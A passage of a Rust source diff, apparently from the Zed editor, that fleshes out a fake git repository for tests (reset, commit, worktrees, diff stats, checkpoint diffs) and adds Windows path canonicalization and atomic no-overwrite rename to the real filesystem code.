@@ impl GitRepository for FakeGitRepository { fn reset( &self, - _commit: String, - _mode: ResetMode, + commit: String, + mode: ResetMode, _env: Arc>, ) -> BoxFuture<'_, Result<()>> { - unimplemented!() + self.with_state_async(true, move |state| { + let pop_count = if commit == "HEAD~" || commit == "HEAD^" { + 1 + } else if let Some(suffix) = commit.strip_prefix("HEAD~") { + suffix + .parse::() + .with_context(|| format!("Invalid HEAD~ offset: {commit}"))? + } else { + match state + .commit_history + .iter() + .rposition(|entry| entry.sha == commit) + { + Some(index) => state.commit_history.len() - index, + None => anyhow::bail!("Unknown commit ref: {commit}"), + } + }; + + if pop_count == 0 || pop_count > state.commit_history.len() { + anyhow::bail!( + "Cannot reset {pop_count} commit(s): only {} in history", + state.commit_history.len() + ); + } + + let target_index = state.commit_history.len() - pop_count; + let snapshot = state.commit_history[target_index].clone(); + state.commit_history.truncate(target_index); + + match mode { + ResetMode::Soft => { + state.head_contents = snapshot.head_contents; + } + ResetMode::Mixed => { + state.head_contents = snapshot.head_contents; + state.index_contents = state.head_contents.clone(); + } + } + + state.refs.insert("HEAD".into(), snapshot.sha); + Ok(()) + }) } fn checkout_files( @@ -379,18 +431,20 @@ impl GitRepository for FakeGitRepository { } fn stash_entries(&self) -> BoxFuture<'_, Result> { - async { Ok(git::stash::GitStash::default()) }.boxed() + self.with_state_async(false, |state| Ok(state.stash_entries.clone())) } fn branches(&self) -> BoxFuture<'_, Result>> { self.with_state_async(false, move |state| { let current_branch = &state.current_branch_name; - Ok(state + let mut branches = state .branches .iter() .map(|branch_name| { let ref_name = if branch_name.starts_with("refs/") { branch_name.into() + } else if branch_name.contains('/') { + format!("refs/remotes/{branch_name}").into() } else { 
format!("refs/heads/{branch_name}").into() }; @@ -401,53 +455,163 @@ impl GitRepository for FakeGitRepository { upstream: None, } }) - .collect()) + .collect::>(); + // compute snapshot expects these to be sorted by ref_name + // because that's what git itself does + branches.sort_by(|a, b| a.ref_name.cmp(&b.ref_name)); + Ok(branches) }) } fn worktrees(&self) -> BoxFuture<'_, Result>> { - self.with_state_async(false, |state| Ok(state.worktrees.clone())) + let fs = self.fs.clone(); + let common_dir_path = self.common_dir_path.clone(); + let executor = self.executor.clone(); + + async move { + executor.simulate_random_delay().await; + + let (main_worktree, refs) = fs.with_git_state(&common_dir_path, false, |state| { + let work_dir = common_dir_path + .parent() + .map(PathBuf::from) + .unwrap_or_else(|| common_dir_path.clone()); + let head_sha = state + .refs + .get("HEAD") + .cloned() + .unwrap_or_else(|| "0000000".to_string()); + let branch_ref = state + .current_branch_name + .as_ref() + .map(|name| format!("refs/heads/{name}")) + .unwrap_or_else(|| "refs/heads/main".to_string()); + let main_wt = Worktree { + path: work_dir, + ref_name: Some(branch_ref.into()), + sha: head_sha.into(), + is_main: true, + }; + (main_wt, state.refs.clone()) + })?; + + let mut all = vec![main_worktree]; + + let worktrees_dir = common_dir_path.join("worktrees"); + if let Ok(mut entries) = fs.read_dir(&worktrees_dir).await { + use futures::StreamExt; + while let Some(Ok(entry_path)) = entries.next().await { + let head_content = match fs.load(&entry_path.join("HEAD")).await { + Ok(content) => content, + Err(_) => continue, + }; + let gitdir_content = match fs.load(&entry_path.join("gitdir")).await { + Ok(content) => content, + Err(_) => continue, + }; + + let ref_name = head_content + .strip_prefix("ref: ") + .map(|s| s.trim().to_string()); + let sha = ref_name + .as_ref() + .and_then(|r| refs.get(r)) + .cloned() + .unwrap_or_else(|| head_content.trim().to_string()); + + let worktree_path 
= PathBuf::from(gitdir_content.trim()) + .parent() + .map(PathBuf::from) + .unwrap_or_default(); + + all.push(Worktree { + path: worktree_path, + ref_name: ref_name.map(Into::into), + sha: sha.into(), + is_main: false, + }); + } + } + + Ok(all) + } + .boxed() } fn create_worktree( &self, - name: String, - directory: PathBuf, + branch_name: Option, + path: PathBuf, from_commit: Option, ) -> BoxFuture<'_, Result<()>> { let fs = self.fs.clone(); let executor = self.executor.clone(); let dot_git_path = self.dot_git_path.clone(); + let common_dir_path = self.common_dir_path.clone(); async move { - let path = directory.join(&name); executor.simulate_random_delay().await; - // Check for simulated error before any side effects + // Check for simulated error and duplicate branch before any side effects. fs.with_git_state(&dot_git_path, false, |state| { if let Some(message) = &state.simulated_create_worktree_error { anyhow::bail!("{message}"); } + if let Some(ref name) = branch_name { + if state.branches.contains(name) { + bail!("a branch named '{}' already exists", name); + } + } Ok(()) })??; - // Create directory before updating state so state is never - // inconsistent with the filesystem + + // Create the worktree checkout directory. fs.create_dir(&path).await?; - fs.with_git_state(&dot_git_path, true, { - let path = path.clone(); - move |state| { - if state.branches.contains(&name) { - bail!("a branch named '{}' already exists", name); - } - let ref_name = format!("refs/heads/{name}"); - let sha = from_commit.unwrap_or_else(|| "fake-sha".to_string()); - state.refs.insert(ref_name.clone(), sha.clone()); - state.worktrees.push(Worktree { - path, - ref_name: ref_name.into(), - sha: sha.into(), - }); - state.branches.insert(name); - Ok::<(), anyhow::Error>(()) + + // Create .git/worktrees// directory with HEAD, commondir, gitdir. 
+ let worktree_entry_name = branch_name + .as_deref() + .unwrap_or_else(|| path.file_name().unwrap().to_str().unwrap()); + let worktrees_entry_dir = common_dir_path.join("worktrees").join(worktree_entry_name); + fs.create_dir(&worktrees_entry_dir).await?; + + let sha = from_commit.unwrap_or_else(|| "fake-sha".to_string()); + let head_content = if let Some(ref branch_name) = branch_name { + let ref_name = format!("refs/heads/{branch_name}"); + format!("ref: {ref_name}") + } else { + sha.clone() + }; + fs.write_file_internal( + worktrees_entry_dir.join("HEAD"), + head_content.into_bytes(), + false, + )?; + fs.write_file_internal( + worktrees_entry_dir.join("commondir"), + common_dir_path.to_string_lossy().into_owned().into_bytes(), + false, + )?; + let worktree_dot_git = path.join(".git"); + fs.write_file_internal( + worktrees_entry_dir.join("gitdir"), + worktree_dot_git.to_string_lossy().into_owned().into_bytes(), + false, + )?; + + // Create .git file in the worktree checkout. + fs.write_file_internal( + &worktree_dot_git, + format!("gitdir: {}", worktrees_entry_dir.display()).into_bytes(), + false, + )?; + + // Update git state: add ref and branch. 
+ fs.with_git_state(&dot_git_path, true, move |state| { + if let Some(branch_name) = branch_name { + let ref_name = format!("refs/heads/{branch_name}"); + state.refs.insert(ref_name, sha); + state.branches.insert(branch_name); } + Ok::<(), anyhow::Error>(()) })??; Ok(()) } @@ -457,20 +621,23 @@ impl GitRepository for FakeGitRepository { fn remove_worktree(&self, path: PathBuf, _force: bool) -> BoxFuture<'_, Result<()>> { let fs = self.fs.clone(); let executor = self.executor.clone(); - let dot_git_path = self.dot_git_path.clone(); + let common_dir_path = self.common_dir_path.clone(); async move { executor.simulate_random_delay().await; - // Validate the worktree exists in state before touching the filesystem - fs.with_git_state(&dot_git_path, false, { - let path = path.clone(); - move |state| { - if !state.worktrees.iter().any(|w| w.path == path) { - bail!("no worktree found at path: {}", path.display()); - } - Ok(()) - } - })??; - // Now remove the directory + + // Read the worktree's .git file to find its entry directory. + let dot_git_file = path.join(".git"); + let content = fs + .load(&dot_git_file) + .await + .with_context(|| format!("no worktree found at path: {}", path.display()))?; + let gitdir = content + .strip_prefix("gitdir:") + .context("invalid .git file in worktree")? + .trim(); + let worktree_entry_dir = PathBuf::from(gitdir); + + // Remove the worktree checkout directory. fs.remove_dir( &path, RemoveOptions { @@ -479,11 +646,21 @@ impl GitRepository for FakeGitRepository { }, ) .await?; - // Update state - fs.with_git_state(&dot_git_path, true, move |state| { - state.worktrees.retain(|worktree| worktree.path != path); - Ok::<(), anyhow::Error>(()) - })??; + + // Remove the .git/worktrees// directory. + fs.remove_dir( + &worktree_entry_dir, + RemoveOptions { + recursive: true, + ignore_if_not_exists: false, + }, + ) + .await?; + + // Emit a git event on the main .git directory so the scanner + // notices the change. 
+ fs.with_git_state(&common_dir_path, true, |_| {})?; + Ok(()) } .boxed() @@ -492,20 +669,23 @@ impl GitRepository for FakeGitRepository { fn rename_worktree(&self, old_path: PathBuf, new_path: PathBuf) -> BoxFuture<'_, Result<()>> { let fs = self.fs.clone(); let executor = self.executor.clone(); - let dot_git_path = self.dot_git_path.clone(); + let common_dir_path = self.common_dir_path.clone(); async move { executor.simulate_random_delay().await; - // Validate the worktree exists in state before touching the filesystem - fs.with_git_state(&dot_git_path, false, { - let old_path = old_path.clone(); - move |state| { - if !state.worktrees.iter().any(|w| w.path == old_path) { - bail!("no worktree found at path: {}", old_path.display()); - } - Ok(()) - } - })??; - // Now move the directory + + // Read the worktree's .git file to find its entry directory. + let dot_git_file = old_path.join(".git"); + let content = fs + .load(&dot_git_file) + .await + .with_context(|| format!("no worktree found at path: {}", old_path.display()))?; + let gitdir = content + .strip_prefix("gitdir:") + .context("invalid .git file in worktree")? + .trim(); + let worktree_entry_dir = PathBuf::from(gitdir); + + // Move the worktree checkout directory. fs.rename( &old_path, &new_path, @@ -516,16 +696,27 @@ impl GitRepository for FakeGitRepository { }, ) .await?; - // Update state - fs.with_git_state(&dot_git_path, true, move |state| { - let worktree = state - .worktrees - .iter_mut() - .find(|worktree| worktree.path == old_path) - .expect("worktree was validated above"); - worktree.path = new_path; - Ok::<(), anyhow::Error>(()) - })??; + + // Update the gitdir file in .git/worktrees// to point to the + // new location. + let new_dot_git = new_path.join(".git"); + fs.write_file_internal( + worktree_entry_dir.join("gitdir"), + new_dot_git.to_string_lossy().into_owned().into_bytes(), + false, + )?; + + // Update the .git file in the moved worktree checkout. 
+ fs.write_file_internal( + &new_dot_git, + format!("gitdir: {}", worktree_entry_dir.display()).into_bytes(), + false, + )?; + + // Emit a git event on the main .git directory so the scanner + // notices the change. + fs.with_git_state(&common_dir_path, true, |_| {})?; + Ok(()) } .boxed() @@ -544,6 +735,11 @@ impl GitRepository for FakeGitRepository { _base_branch: Option, ) -> BoxFuture<'_, Result<()>> { self.with_state_async(true, move |state| { + if let Some((remote, _)) = name.split_once('/') + && !state.remotes.contains_key(remote) + { + state.remotes.insert(remote.to_owned(), "".to_owned()); + } state.branches.insert(name); Ok(()) }) @@ -562,7 +758,7 @@ impl GitRepository for FakeGitRepository { }) } - fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>> { + fn delete_branch(&self, _is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> { self.with_state_async(true, move |state| { if !state.branches.remove(&name) { bail!("no such branch: {name}"); @@ -689,11 +885,30 @@ impl GitRepository for FakeGitRepository { &self, _message: gpui::SharedString, _name_and_email: Option<(gpui::SharedString, gpui::SharedString)>, - _options: CommitOptions, + options: CommitOptions, _askpass: AskPassDelegate, _env: Arc>, ) -> BoxFuture<'_, Result<()>> { - async { Ok(()) }.boxed() + self.with_state_async(true, move |state| { + if !options.allow_empty && !options.amend && state.index_contents == state.head_contents + { + anyhow::bail!("nothing to commit (use allow_empty to create an empty commit)"); + } + + let old_sha = state.refs.get("HEAD").cloned().unwrap_or_default(); + state.commit_history.push(FakeCommitSnapshot { + head_contents: state.head_contents.clone(), + index_contents: state.index_contents.clone(), + sha: old_sha, + }); + + state.head_contents = state.index_contents.clone(); + + let new_sha = format!("fake-commit-{}", state.commit_history.len()); + state.refs.insert("HEAD".into(), new_sha); + + Ok(()) + }) } fn run_hook( @@ -765,13 +980,13 @@ 
impl GitRepository for FakeGitRepository { } fn diff(&self, _diff: git::repository::DiffType) -> BoxFuture<'_, Result> { - unimplemented!() + future::ready(Ok(String::new())).boxed() } fn diff_stat( &self, - diff_type: git::repository::DiffType, - ) -> BoxFuture<'_, Result>> { + path_prefixes: &[RepoPath], + ) -> BoxFuture<'_, Result> { fn count_lines(s: &str) -> u32 { if s.is_empty() { 0 @@ -780,122 +995,95 @@ impl GitRepository for FakeGitRepository { } } - match diff_type { - git::repository::DiffType::HeadToIndex => self - .with_state_async(false, |state| { - let mut result = HashMap::default(); - let all_paths: HashSet<&RepoPath> = state - .head_contents - .keys() - .chain(state.index_contents.keys()) - .collect(); - for path in all_paths { - let head = state.head_contents.get(path); - let index = state.index_contents.get(path); - match (head, index) { - (Some(old), Some(new)) if old != new => { - result.insert( - path.clone(), - git::status::DiffStat { - added: count_lines(new), - deleted: count_lines(old), - }, - ); - } - (Some(old), None) => { - result.insert( - path.clone(), - git::status::DiffStat { - added: 0, - deleted: count_lines(old), - }, - ); - } - (None, Some(new)) => { - result.insert( - path.clone(), - git::status::DiffStat { - added: count_lines(new), - deleted: 0, - }, - ); - } - _ => {} - } - } - Ok(result) - }) - .boxed(), - git::repository::DiffType::HeadToWorktree => { - let workdir_path = self.dot_git_path.parent().unwrap().to_path_buf(); - let worktree_files: HashMap = self + fn matches_prefixes(path: &RepoPath, prefixes: &[RepoPath]) -> bool { + if prefixes.is_empty() { + return true; + } + prefixes.iter().any(|prefix| { + let prefix_str = prefix.as_unix_str(); + if prefix_str == "." 
{ + return true; + } + path == prefix || path.starts_with(&prefix) + }) + } + + let path_prefixes = path_prefixes.to_vec(); + + let workdir_path = self.dot_git_path.parent().unwrap().to_path_buf(); + let worktree_files: HashMap = self + .fs + .files() + .iter() + .filter_map(|path| { + let repo_path = path.strip_prefix(&workdir_path).ok()?; + if repo_path.starts_with(".git") { + return None; + } + let content = self .fs - .files() - .iter() - .filter_map(|path| { - let repo_path = path.strip_prefix(&workdir_path).ok()?; - if repo_path.starts_with(".git") { - return None; - } - let content = self - .fs - .read_file_sync(path) - .ok() - .and_then(|bytes| String::from_utf8(bytes).ok())?; - let repo_path = RelPath::new(repo_path, PathStyle::local()).ok()?; - Some((RepoPath::from_rel_path(&repo_path), content)) - }) - .collect(); + .read_file_sync(path) + .ok() + .and_then(|bytes| String::from_utf8(bytes).ok())?; + let repo_path = RelPath::new(repo_path, PathStyle::local()).ok()?; + Some((RepoPath::from_rel_path(&repo_path), content)) + }) + .collect(); - self.with_state_async(false, move |state| { - let mut result = HashMap::default(); - let all_paths: HashSet<&RepoPath> = state - .head_contents + self.with_state_async(false, move |state| { + let mut entries = Vec::new(); + let all_paths: HashSet<&RepoPath> = state + .head_contents + .keys() + .chain( + worktree_files .keys() - .chain(worktree_files.keys()) - .collect(); - for path in all_paths { - let head = state.head_contents.get(path); - let worktree = worktree_files.get(path); - match (head, worktree) { - (Some(old), Some(new)) if old != new => { - result.insert( - path.clone(), - git::status::DiffStat { - added: count_lines(new), - deleted: count_lines(old), - }, - ); - } - (Some(old), None) => { - result.insert( - path.clone(), - git::status::DiffStat { - added: 0, - deleted: count_lines(old), - }, - ); - } - (None, Some(new)) => { - result.insert( - path.clone(), - git::status::DiffStat { - added: 
count_lines(new), - deleted: 0, - }, - ); - } - _ => {} - } + .filter(|p| state.index_contents.contains_key(*p)), + ) + .collect(); + for path in all_paths { + if !matches_prefixes(path, &path_prefixes) { + continue; + } + let head = state.head_contents.get(path); + let worktree = worktree_files.get(path); + match (head, worktree) { + (Some(old), Some(new)) if old != new => { + entries.push(( + path.clone(), + git::status::DiffStat { + added: count_lines(new), + deleted: count_lines(old), + }, + )); } - Ok(result) - }) - .boxed() - } - git::repository::DiffType::MergeBase { .. } => { - future::ready(Ok(HashMap::default())).boxed() + (Some(old), None) => { + entries.push(( + path.clone(), + git::status::DiffStat { + added: 0, + deleted: count_lines(old), + }, + )); + } + (None, Some(new)) => { + entries.push(( + path.clone(), + git::status::DiffStat { + added: count_lines(new), + deleted: 0, + }, + )); + } + _ => {} + } } - } + entries.sort_by(|(a, _), (b, _)| a.cmp(b)); + Ok(git::status::GitDiffStat { + entries: entries.into(), + }) + }) + .boxed() } fn checkpoint(&self) -> BoxFuture<'static, Result> { @@ -954,10 +1142,88 @@ impl GitRepository for FakeGitRepository { fn diff_checkpoints( &self, - _base_checkpoint: GitRepositoryCheckpoint, - _target_checkpoint: GitRepositoryCheckpoint, + base_checkpoint: GitRepositoryCheckpoint, + target_checkpoint: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - unimplemented!() + let executor = self.executor.clone(); + let checkpoints = self.checkpoints.clone(); + async move { + executor.simulate_random_delay().await; + let checkpoints = checkpoints.lock(); + let base = checkpoints + .get(&base_checkpoint.commit_sha) + .context(format!( + "invalid base checkpoint: {}", + base_checkpoint.commit_sha + ))?; + let target = checkpoints + .get(&target_checkpoint.commit_sha) + .context(format!( + "invalid target checkpoint: {}", + target_checkpoint.commit_sha + ))?; + + fn collect_files( + entry: &FakeFsEntry, + prefix: String, + 
out: &mut std::collections::BTreeMap, + ) { + match entry { + FakeFsEntry::File { content, .. } => { + out.insert(prefix, String::from_utf8_lossy(content).into_owned()); + } + FakeFsEntry::Dir { entries, .. } => { + for (name, child) in entries { + let path = if prefix.is_empty() { + name.clone() + } else { + format!("{prefix}/{name}") + }; + collect_files(child, path, out); + } + } + FakeFsEntry::Symlink { .. } => {} + } + } + + let mut base_files = std::collections::BTreeMap::new(); + let mut target_files = std::collections::BTreeMap::new(); + collect_files(base, String::new(), &mut base_files); + collect_files(target, String::new(), &mut target_files); + + let all_paths: std::collections::BTreeSet<&String> = + base_files.keys().chain(target_files.keys()).collect(); + + let mut diff = String::new(); + for path in all_paths { + match (base_files.get(path), target_files.get(path)) { + (Some(base_content), Some(target_content)) + if base_content != target_content => + { + diff.push_str(&format!("diff --git a/{path} b/{path}\n")); + diff.push_str(&format!("--- a/{path}\n")); + diff.push_str(&format!("+++ b/{path}\n")); + for line in base_content.lines() { + diff.push_str(&format!("-{line}\n")); + } + for line in target_content.lines() { + diff.push_str(&format!("+{line}\n")); + } + } + (Some(_), None) => { + diff.push_str(&format!("diff --git a/{path} /dev/null\n")); + diff.push_str("deleted file\n"); + } + (None, Some(_)) => { + diff.push_str(&format!("diff --git /dev/null b/{path}\n")); + diff.push_str("new file\n"); + } + _ => {} + } + } + Ok(diff) + } + .boxed() } fn default_branch( @@ -983,6 +1249,11 @@ impl GitRepository for FakeGitRepository { fn remove_remote(&self, name: String) -> BoxFuture<'_, Result<()>> { self.with_state_async(true, move |state| { + state.branches.retain(|branch| { + branch + .split_once('/') + .is_none_or(|(remote, _)| remote != name) + }); state.remotes.remove(&name); Ok(()) }) @@ -1008,149 +1279,43 @@ impl GitRepository for 
FakeGitRepository { .boxed() } + fn search_commits( + &self, + _log_source: LogSource, + _search_args: SearchCommitArgs, + _request_tx: Sender, + ) -> BoxFuture<'_, Result<()>> { + async { bail!("search_commits not supported for FakeGitRepository") }.boxed() + } + fn commit_data_reader(&self) -> Result { anyhow::bail!("commit_data_reader not supported for FakeGitRepository") } -} -#[cfg(test)] -mod tests { - use super::*; - use crate::{FakeFs, Fs}; - use gpui::TestAppContext; - use serde_json::json; - use std::path::Path; - - #[gpui::test] - async fn test_fake_worktree_lifecycle(cx: &mut TestAppContext) { - let worktree_dir_settings = &["../worktrees", ".git/zed-worktrees", "my-worktrees/"]; - - for worktree_dir_setting in worktree_dir_settings { - let fs = FakeFs::new(cx.executor()); - fs.insert_tree("/project", json!({".git": {}, "file.txt": "content"})) - .await; - let repo = fs - .open_repo(Path::new("/project/.git"), None) - .expect("should open fake repo"); - - // Initially no worktrees - let worktrees = repo.worktrees().await.unwrap(); - assert!(worktrees.is_empty()); - - let expected_dir = git::repository::resolve_worktree_directory( - Path::new("/project"), - worktree_dir_setting, - ); - - // Create a worktree - repo.create_worktree( - "feature-branch".to_string(), - expected_dir.clone(), - Some("abc123".to_string()), - ) - .await - .unwrap(); - - // List worktrees — should have one - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert_eq!( - worktrees[0].path, - expected_dir.join("feature-branch"), - "failed for worktree_directory setting: {worktree_dir_setting:?}" - ); - assert_eq!(worktrees[0].ref_name.as_ref(), "refs/heads/feature-branch"); - assert_eq!(worktrees[0].sha.as_ref(), "abc123"); - - // Directory should exist in FakeFs after create - assert!( - fs.is_dir(&expected_dir.join("feature-branch")).await, - "worktree directory should be created in FakeFs for setting {worktree_dir_setting:?}" - ); - - // 
Create a second worktree (without explicit commit) - repo.create_worktree("bugfix-branch".to_string(), expected_dir.clone(), None) - .await - .unwrap(); - - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 2); - assert!( - fs.is_dir(&expected_dir.join("bugfix-branch")).await, - "second worktree directory should be created in FakeFs for setting {worktree_dir_setting:?}" - ); - - // Rename the first worktree - repo.rename_worktree( - expected_dir.join("feature-branch"), - expected_dir.join("renamed-branch"), - ) - .await - .unwrap(); + fn update_ref(&self, ref_name: String, commit: String) -> BoxFuture<'_, Result<()>> { + self.with_state_async(true, move |state| { + state.refs.insert(ref_name, commit); + Ok(()) + }) + } - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 2); - assert!( - worktrees - .iter() - .any(|w| w.path == expected_dir.join("renamed-branch")), - "renamed worktree should exist at new path for setting {worktree_dir_setting:?}" - ); - assert!( - worktrees - .iter() - .all(|w| w.path != expected_dir.join("feature-branch")), - "old path should no longer exist for setting {worktree_dir_setting:?}" - ); - - // Directory should be moved in FakeFs after rename - assert!( - !fs.is_dir(&expected_dir.join("feature-branch")).await, - "old worktree directory should not exist after rename for setting {worktree_dir_setting:?}" - ); - assert!( - fs.is_dir(&expected_dir.join("renamed-branch")).await, - "new worktree directory should exist after rename for setting {worktree_dir_setting:?}" - ); - - // Rename a nonexistent worktree should fail - let result = repo - .rename_worktree(PathBuf::from("/nonexistent"), PathBuf::from("/somewhere")) - .await; - assert!(result.is_err()); - - // Remove a worktree - repo.remove_worktree(expected_dir.join("renamed-branch"), false) - .await - .unwrap(); - - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert_eq!(worktrees[0].path, 
expected_dir.join("bugfix-branch")); - - // Directory should be removed from FakeFs after remove - assert!( - !fs.is_dir(&expected_dir.join("renamed-branch")).await, - "worktree directory should be removed from FakeFs for setting {worktree_dir_setting:?}" - ); - - // Remove a nonexistent worktree should fail - let result = repo - .remove_worktree(PathBuf::from("/nonexistent"), false) - .await; - assert!(result.is_err()); - - // Remove the last worktree - repo.remove_worktree(expected_dir.join("bugfix-branch"), false) - .await - .unwrap(); - - let worktrees = repo.worktrees().await.unwrap(); - assert!(worktrees.is_empty()); - assert!( - !fs.is_dir(&expected_dir.join("bugfix-branch")).await, - "last worktree directory should be removed from FakeFs for setting {worktree_dir_setting:?}" - ); - } + fn delete_ref(&self, ref_name: String) -> BoxFuture<'_, Result<()>> { + self.with_state_async(true, move |state| { + state.refs.remove(&ref_name); + Ok(()) + }) + } + + fn repair_worktrees(&self) -> BoxFuture<'_, Result<()>> { + async { Ok(()) }.boxed() + } + + fn set_trusted(&self, trusted: bool) { + self.is_trusted + .store(trusted, std::sync::atomic::Ordering::Release); + } + + fn is_trusted(&self) -> bool { + self.is_trusted.load(std::sync::atomic::Ordering::Acquire) } } diff --git a/crates/fs/src/fs.rs b/crates/fs/src/fs.rs index 2db9e48a2e77bdb3e49fce0b16ea9b67ffaacbc0..a26abb81255003e4059f9bcc8a68aa3c6212a73a 100644 --- a/crates/fs/src/fs.rs +++ b/crates/fs/src/fs.rs @@ -15,10 +15,14 @@ use gpui::Global; use gpui::ReadGlobal as _; use gpui::SharedString; use std::borrow::Cow; +#[cfg(unix)] +use std::ffi::CString; use util::command::new_command; #[cfg(unix)] use std::os::fd::{AsFd, AsRawFd}; +#[cfg(unix)] +use std::os::unix::ffi::OsStrExt; #[cfg(unix)] use std::os::unix::fs::{FileTypeExt, MetadataExt}; @@ -33,7 +37,7 @@ use is_executable::IsExecutable; use rope::Rope; use serde::{Deserialize, Serialize}; use smol::io::AsyncWriteExt; -#[cfg(any(target_os = "windows", 
feature = "test-support"))] +#[cfg(feature = "test-support")] use std::path::Component; use std::{ io::{self, Write}, @@ -53,9 +57,11 @@ use collections::{BTreeMap, btree_map}; use fake_git_repo::FakeGitRepositoryState; #[cfg(feature = "test-support")] use git::{ - repository::{InitialGraphCommitData, RepoPath, repo_path}, + repository::{InitialGraphCommitData, RepoPath, Worktree, repo_path}, status::{FileStatus, StatusCode, TrackedStatus, UnmergedStatus}, }; +#[cfg(feature = "test-support")] +use util::normalize_path; #[cfg(feature = "test-support")] use smol::io::AsyncReadExt; @@ -72,6 +78,7 @@ pub enum PathEventKind { Removed, Created, Changed, + Rescan, } #[derive(Clone, PartialEq, Eq, PartialOrd, Ord, Debug)] @@ -143,7 +150,7 @@ pub trait Fs: Send + Sync { &self, abs_dot_git: &Path, system_git_binary_path: Option<&Path>, - ) -> Option>; + ) -> Result>; async fn git_init(&self, abs_work_directory: &Path, fallback_branch_name: String) -> Result<()>; async fn git_clone(&self, repo_url: &str, abs_work_directory: &Path) -> Result<()>; @@ -427,83 +434,101 @@ impl RealFs { #[cfg(target_os = "windows")] fn canonicalize(path: &Path) -> Result { - let mut strip_prefix = None; + use std::ffi::OsString; + use std::os::windows::ffi::OsStringExt; + use windows::Win32::Storage::FileSystem::GetVolumePathNameW; + use windows::core::HSTRING; - let mut new_path = PathBuf::new(); - for component in path.components() { - match component { - std::path::Component::Prefix(_) => { - let component = component.as_os_str(); - let canonicalized = if component - .to_str() - .map(|e| e.ends_with("\\")) - .unwrap_or(false) - { - std::fs::canonicalize(component) - } else { - let mut component = component.to_os_string(); - component.push("\\"); - std::fs::canonicalize(component) - }?; - - let mut strip = PathBuf::new(); - for component in canonicalized.components() { - match component { - Component::Prefix(prefix_component) => { - match prefix_component.kind() { - 
std::path::Prefix::Verbatim(os_str) => { - strip.push(os_str); - } - std::path::Prefix::VerbatimUNC(host, share) => { - strip.push("\\\\"); - strip.push(host); - strip.push(share); - } - std::path::Prefix::VerbatimDisk(disk) => { - strip.push(format!("{}:", disk as char)); - } - _ => strip.push(component), - }; - } - _ => strip.push(component), - } - } - strip_prefix = Some(strip); - new_path.push(component); - } - std::path::Component::RootDir => { - new_path.push(component); - } - std::path::Component::CurDir => { - if strip_prefix.is_none() { - // unrooted path - new_path.push(component); - } - } - std::path::Component::ParentDir => { - if strip_prefix.is_some() { - // rooted path - new_path.pop(); - } else { - new_path.push(component); - } - } - std::path::Component::Normal(_) => { - if let Ok(link) = std::fs::read_link(new_path.join(component)) { - let link = match &strip_prefix { - Some(e) => link.strip_prefix(e).unwrap_or(&link), - None => &link, - }; - new_path.extend(link); - } else { - new_path.push(component); - } - } - } + // std::fs::canonicalize resolves mapped network paths to UNC paths, which can + // confuse some software. To mitigate this, we canonicalize the input, then rebase + // the result onto the input's original volume root if both paths are on the same + // volume. This keeps the same drive letter or mount point the caller used. + + let abs_path = if path.is_relative() { + std::env::current_dir()?.join(path) + } else { + path.to_path_buf() + }; + + let path_hstring = HSTRING::from(abs_path.as_os_str()); + let mut vol_buf = vec![0u16; abs_path.as_os_str().len() + 2]; + unsafe { GetVolumePathNameW(&path_hstring, &mut vol_buf)? 
}; + let volume_root = { + let len = vol_buf + .iter() + .position(|&c| c == 0) + .unwrap_or(vol_buf.len()); + PathBuf::from(OsString::from_wide(&vol_buf[..len])) + }; + + let resolved_path = dunce::canonicalize(&abs_path)?; + let resolved_root = dunce::canonicalize(&volume_root)?; + + if let Ok(relative) = resolved_path.strip_prefix(&resolved_root) { + let mut result = volume_root; + result.push(relative); + Ok(result) + } else { + Ok(resolved_path) } + } +} - Ok(new_path) +#[cfg(any(target_os = "macos", target_os = "linux"))] +fn rename_without_replace(source: &Path, target: &Path) -> io::Result<()> { + let source = path_to_c_string(source)?; + let target = path_to_c_string(target)?; + + #[cfg(target_os = "macos")] + let result = unsafe { libc::renamex_np(source.as_ptr(), target.as_ptr(), libc::RENAME_EXCL) }; + + #[cfg(target_os = "linux")] + let result = unsafe { + libc::syscall( + libc::SYS_renameat2, + libc::AT_FDCWD, + source.as_ptr(), + libc::AT_FDCWD, + target.as_ptr(), + libc::RENAME_NOREPLACE, + ) + }; + + if result == 0 { + Ok(()) + } else { + Err(io::Error::last_os_error()) + } +} + +#[cfg(target_os = "windows")] +fn rename_without_replace(source: &Path, target: &Path) -> io::Result<()> { + use std::os::windows::ffi::OsStrExt; + + use windows::Win32::Storage::FileSystem::{MOVE_FILE_FLAGS, MoveFileExW}; + use windows::core::PCWSTR; + + let source: Vec = source.as_os_str().encode_wide().chain(Some(0)).collect(); + let target: Vec = target.as_os_str().encode_wide().chain(Some(0)).collect(); + + unsafe { + MoveFileExW( + PCWSTR(source.as_ptr()), + PCWSTR(target.as_ptr()), + MOVE_FILE_FLAGS::default(), + ) } + .map_err(|_| io::Error::last_os_error()) +} + +#[cfg(any(target_os = "macos", target_os = "linux"))] +fn path_to_c_string(path: &Path) -> io::Result { + CString::new(path.as_os_str().as_bytes()).map_err(|_| { + io::Error::new( + io::ErrorKind::InvalidInput, + format!("path contains interior NUL: {}", path.display()), + ) + }) } 
#[async_trait::async_trait] @@ -588,7 +613,59 @@ impl Fs for RealFs { } async fn rename(&self, source: &Path, target: &Path, options: RenameOptions) -> Result<()> { - if !options.overwrite && smol::fs::metadata(target).await.is_ok() { + if options.create_parents { + if let Some(parent) = target.parent() { + self.create_dir(parent).await?; + } + } + + if options.overwrite { + smol::fs::rename(source, target).await?; + return Ok(()); + } + + let use_metadata_fallback = { + #[cfg(any(target_os = "macos", target_os = "linux", target_os = "windows"))] + { + let source = source.to_path_buf(); + let target = target.to_path_buf(); + match self + .executor + .spawn(async move { rename_without_replace(&source, &target) }) + .await + { + Ok(()) => return Ok(()), + Err(error) if error.kind() == io::ErrorKind::AlreadyExists => { + if options.ignore_if_exists { + return Ok(()); + } + return Err(error.into()); + } + Err(error) + if error.raw_os_error().is_some_and(|code| { + code == libc::ENOSYS + || code == libc::ENOTSUP + || code == libc::EOPNOTSUPP + || code == libc::EINVAL + }) => + { + // For case when filesystem or kernel does not support atomic no-overwrite rename. + // EINVAL is returned by FUSE-based filesystems (e.g. NTFS via ntfs-3g) + // that don't support RENAME_NOREPLACE. + true + } + Err(error) => return Err(error.into()), + } + } + 